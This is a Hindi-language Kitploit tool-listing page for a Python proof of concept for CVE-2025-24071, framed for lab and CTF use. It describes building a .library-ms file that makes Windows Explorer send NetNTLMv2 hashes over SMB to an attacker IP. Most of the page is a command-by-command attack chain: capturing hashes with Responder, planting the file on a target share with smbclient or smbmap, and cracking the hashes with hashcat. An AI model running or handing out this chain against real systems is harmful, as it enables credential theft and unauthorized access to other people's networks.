Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2025-24071 — CVE-2025-24071 के लिए Python PoC जो एक .library-ms फ़ाइल बनाता है ताकि Windows Explorer को SMB पर NetNTLMv2 हैश लीक करने के लिए विवश किया जा सके, जिन्हें कैप्चर और क्रैक किया जा सके। | Kitploit
उपकरण/GitHubGitHub/daemon-404/poc-cve-2025-24071
पासवर्ड हमलेभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षाCTFपेनिट्रेशन टेस्टिंगरेड टीमिंगलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
daemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

CVE-2025-24071 के लिए Python PoC जो एक .library-ms फ़ाइल बनाता है ताकि Windows Explorer को SMB पर NetNTLMv2 हैश लीक करने के लिए विवश किया जा सके, जिन्हें कैप्चर और क्रैक किया जा सके।

रिपॉजिटरी देखें
13घं 53मि पहलेअभी तक समीक्षित नहीं

❀ coerce-library

CVE-2025-24071 — .library-ms NTLM coercion (SMB / TAR विधि)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ यह क्या करता है

आपका attack IP और एक file name मांगता है, \\<IP>\share की ओर इशारा करने वाली एक .library-ms फ़ाइल लिखता है, और उसे exploit.tar में पैक कर देता है। जब Explorer उस फ़ोल्डर को ब्राउज़ करता है जिसमें यह loose .library-ms पड़ी होती है, तो वह उस UNC path को स्वतः resolve कर लेता है और account का NTLMv2 आपके listener तक leak कर देता है — किसी click की आवश्यकता नहीं।

⚠️ जो चीज़ fire करती है वह loose .library-ms है — .tar नहीं। share पर पड़ी .tar निष्क्रिय रहती है; Explorer tarballs को parse नहीं करता। आपको .library-ms को ही एक loose फ़ाइल के रूप में share पर पहुँचाना होगा। यह कैसे करें, यह tool पर निर्भर करता है (नीचे देखें)।


❀ इसे चलाएँ

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ फिर

1) सुनें

root@kitploit:~
sudo responder -I tun0

2) .library-ms को एक writable share पर पहुँचाएँ

smbclient — .tar upload करें, उसे tar x के साथ server-side extract करें (उसके बगल में loose .library-ms गिरा देता है):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — इसमें extraction का कोई चरण नहीं है, इसलिए loose .library-ms को सीधे upload करें (यहाँ .tar upload करने से कुछ नहीं होगा — यह उसे unpack नहीं कर सकता):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

पुष्टि करें कि यह share पर loose पहुँच गई है:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) कैप्चर किए गए NTLMv2 को crack करें

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ केवल authorized penetration testing / CTF / lab उपयोग के लिए ☧

टूल डाउनलोड करें